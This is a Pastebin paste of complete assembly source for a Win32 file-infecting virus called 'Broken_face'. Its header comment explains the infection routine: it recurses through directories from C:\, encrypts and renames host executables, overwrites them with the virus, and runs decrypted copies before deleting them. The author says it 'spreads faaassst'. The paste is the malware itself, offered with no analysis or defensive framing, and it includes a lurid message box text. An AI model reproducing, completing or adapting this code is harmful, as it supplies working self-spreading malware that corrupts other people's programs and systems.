FlyFar

Win32.Broken_face - Virus Source Code

Mar 9th, 2023
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 6.08 KB | Cybersecurity | 0 0
  1. ;                           ___________________
  2. ;                          | Win32.Broken_face |
  3. ;                          | __________________|
  4. ;               ___________||
  5. ;[ Information ]
  6. ;First, virus moves to the root directory, and scans for
  7. ;directorys.It enters them and checks for executables.If
  8. ;no files found or more files needed, then looks  in the
  9. ;current directory for another subdir. If there isnt any
  10. ;it goes back and enters  another dir etc  etc. Encrypts
  11. ;hostfiles ( marked with _ in front of  their name ) and
  12. ;when its time to execute a host, it decrypts it  into a
  13. ;file marked with $, executes it, and keeps  deleting it
  14. ;until  the file exits so the decrypted file dissapears.
  15. ;Sick method, could not  think of  anything else, but it
  16. ;works  fine. Infected  hosts keep  the original size if
  17. ;they are smaller than 8192 bytes.Thats all. Be carefull
  18. ;if you think of experimenting with it,spreads faaassst.
  19.  
  20. .386
  21. .model flat
  22. .data
  23. fuck dd 0
  24. shit dd 0
  25. ftel dd ?
  26. tdata db 318 dup (?)
  27. target dd ?
  28. Nbytes dd 0
  29. newhandle dd ?
  30. depth db 0
  31. filehandle db 40 dup (?)
  32. find_data db 3180 dup (?)
  33. xdata db 318 dup (?)
  34. files2eat db 0eh  
  35. xhandle dd 0
  36. msg db "There was this boy",0dh,"who had two chlidren",0dh
  37. db "with his sisters",0dh,"They were his daughters",0dh
  38. db "They were his favourite lovers",0dh,"I got no lips,I got no tounge"
  39. db 0dh,"Where there were eyes there's only space",0dh
  40. db "I got no lips, I got no tounge",0dh,"I GOT A BROKEN FACE!",0
  41. .code
  42. extrn ExitProcess:proc
  43. extrn MessageBoxA:proc
  44. extrn FindFirstFileA:proc
  45. extrn FindNextFileA:proc
  46. extrn SetCurrentDirectoryA:proc
  47. extrn DeleteFileA:proc
  48. extrn FindClose:proc
  49. extrn CreateFileA:proc
  50. extrn GetCurrentDirectoryA:proc
  51. extrn ReadFile:proc
  52. extrn WriteFile:proc
  53. extrn CloseHandle:proc
  54. extrn WinExec:proc
  55. extrn GetCommandLineA:proc
  56. extrn CreateProcessA:proc
  57.  
  58. start:
  59. sub esp,1024
  60. mov ebp,esp
  61. call GetCommandLineA
  62. inc eax
  63. mov [ftel],eax
  64. laos:
  65. cmp byte ptr [eax],'"'
  66. je monday
  67. inc eax
  68. jmp laos
  69. monday:
  70. mov byte ptr [eax],0
  71. mov dword ptr [fuck],eax
  72. push offset root
  73. call SetCurrentDirectoryA
  74. xor esi,esi    ;for find_data
  75. xor edi,edi    ;for filehandle
  76.  
  77. find1stdir:
  78. lea eax,[find_data+esi]
  79. push eax
  80. push offset dirmasker
  81. call FindFirstFileA
  82. mov dword ptr [filehandle+edi],eax
  83. cmp dword ptr [find_data+esi],10h ;check if it is a dir
  84. jne find2nddir
  85. cmp byte ptr [find_data+esi+44],"."
  86. je find2nddir
  87. getin:
  88. lea eax,[find_data+44+esi]
  89. push eax
  90. call SetCurrentDirectoryA
  91. inc byte ptr [depth]
  92. push offset xdata
  93. push offset exefile
  94. call FindFirstFileA
  95. cmp eax,-1
  96. jnz fne1
  97.  
  98. dam:
  99. add edi,4
  100. add esi,313
  101. jmp find1stdir
  102. fne1:
  103. mov bh,byte ptr [xdata+43]
  104. mov [xhandle],eax
  105. jmp infect
  106. fne2:
  107. mov byte ptr [xdata+43],bh
  108. push offset xdata
  109. mov eax,[xhandle]
  110. push eax
  111. call FindNextFileA
  112. or eax,eax
  113. jz dam
  114.  
  115. infect:
  116. cmp byte ptr [xdata+44],'_'
  117. je fne2
  118.  
  119. mov bh,byte ptr [xdata+43]
  120. mov byte ptr [xdata+43],'_'
  121. push offset tdata
  122. push offset xdata+43
  123. call FindFirstFileA
  124. cmp eax,-1
  125. jnz fne2
  126.  
  127. dmf:
  128. xor edx,edx
  129. push edx
  130. push 2                      
  131. push 1                      
  132. push edx                    
  133. push edx                    
  134. push 40000000h              
  135. push offset xdata+43
  136. call CreateFileA
  137. cmp eax,-1    
  138. je end         ; failed. back in the box :(
  139. mov [newhandle],eax
  140.  
  141. xor edx,edx
  142. push edx
  143. push edx
  144. push 3
  145. push edx
  146. push edx
  147. push 80000000h
  148. push offset xdata+44
  149. call CreateFileA
  150. mov [target],eax
  151. mov byte ptr [shit],66
  152. call copyfile
  153. call ftopen
  154. xor edx,edx
  155. push edx
  156. push 80
  157. push 3
  158. push edx
  159. push edx
  160. push 40000000h
  161. push offset xdata+44
  162. call CreateFileA
  163. mov [newhandle], eax
  164. call copyfile
  165. jmp end
  166. getback:
  167. cmp byte ptr [depth],0
  168. je realend
  169. dec byte ptr [depth]
  170. push dword ptr [edi+filehandle]
  171. call FindClose
  172. sub esi,313
  173. sub edi,4
  174. push offset cdback
  175. call SetCurrentDirectoryA
  176. jmp find2nddir
  177.  
  178. goroot:
  179. xor esi,esi
  180. mov edi,esi
  181. mov byte ptr [depth],0
  182. push offset root
  183. call SetCurrentDirectoryA ;move to c:\
  184.  
  185. find2nddir:
  186. lea eax,[find_data+esi]
  187. push eax
  188. push dword ptr [filehandle+edi]
  189. call FindNextFileA
  190. or eax,eax
  191. jz getback
  192. cmp dword ptr [find_data+esi],10h
  193. jne find2nddir
  194. cmp byte ptr [find_data+esi+44],'.'
  195. je find2nddir
  196. jmp getin
  197.  
  198. end:
  199. dec byte ptr [files2eat]
  200. cmp byte ptr [files2eat],0
  201. jne fne2
  202. realend:
  203. call dencrypt
  204.  
  205. push 5
  206. push dword ptr [ftel]
  207. call WinExec
  208.  
  209. cmp eax,31
  210. jg fuckup
  211.  
  212. push 0
  213. push offset tag+1
  214. push offset msg
  215. push 0
  216. call MessageBoxA
  217. jmp deadend
  218. fuckup:
  219. push dword ptr [ftel]
  220. call DeleteFileA
  221. or eax,eax
  222. jz fuckup
  223.  
  224. deadend:
  225. push 0
  226. call ExitProcess
  227.  
  228. exefile db '*.exe',0
  229. dirmasker db '*.',0
  230. root db 'c:\',0
  231. cdback db '..',0
  232. tag db '[Broken_face',0,'coded by SuperMovah/MISP]'
  233.  
  234. copyfile:
  235. push 0
  236. push offset Nbytes
  237. push 1024
  238. push ebp
  239. mov eax,[target]
  240. push eax
  241. call ReadFile
  242. mov eax,[Nbytes]
  243. or eax,eax
  244. jz gbgb
  245.  
  246. cmp byte ptr [shit],66
  247. je enchost
  248.  
  249. bck:
  250. push 0
  251. push offset Nbytes
  252. push [Nbytes]
  253. push ebp
  254. mov eax,[newhandle]
  255. push eax
  256. call WriteFile
  257. jmp copyfile
  258.  
  259. gbgb:
  260. push dword ptr [newhandle]
  261. call CloseHandle
  262. push dword ptr [target]
  263. call CloseHandle
  264. mov byte ptr [shit],0
  265. ret
  266.  
  267. enchost:
  268. push esi
  269. mov esi,ebp
  270. mov ecx,100h
  271. xor bx,bx
  272. ench:
  273. add bx,cx
  274. xor word ptr [esi],bx
  275. inc esi
  276. inc esi
  277. loop ench
  278. pop esi
  279.  
  280. mov byte ptr [shit],66
  281. jmp bck
  282.  
  283. dencrypt:
  284. mov esi,dword ptr [fuck]
  285. Tuesday:
  286. cmp byte ptr [esi],'\'
  287. je google
  288. dec esi
  289. loop Tuesday
  290. google:
  291. inc esi
  292. mov al,byte ptr [esi]
  293. mov byte ptr [esi],'_'
  294.  
  295. Friday:
  296. inc esi
  297. mov bl,byte ptr [esi]
  298. mov byte ptr [esi],al
  299. cmp byte ptr [esi],0
  300. jz Sunday
  301. inc esi
  302. mov al,byte ptr [esi]
  303. mov byte ptr [esi],bl
  304. cmp byte ptr [esi],0
  305. jnz Friday
  306. Sunday:
  307. call ftopen
  308.  
  309. mov esi, dword ptr [ftel]
  310. ghho:
  311. inc esi
  312. cmp byte ptr [esi],'_'
  313. jne ghho
  314. mov byte ptr [esi],'$'
  315. xor edx,edx
  316. push edx
  317. push 2
  318. push 1
  319. push edx
  320. push 1
  321. push 40000000h
  322. push dword ptr [ftel]
  323. call CreateFileA
  324. mov [newhandle], eax
  325. mov byte ptr [shit],66
  326. call copyfile
  327. ret
  328.  
  329. ftopen:
  330. xor edx,edx
  331. push edx
  332. push edx
  333. push 3
  334. push edx
  335. push 1
  336. push 80000000h
  337. push dword ptr [ftel]
  338. call CreateFileA
  339. mov [target],eax
  340. ret
  341. end start
  342. ;2-9-2004
Add Comment
Please, Sign In to add comment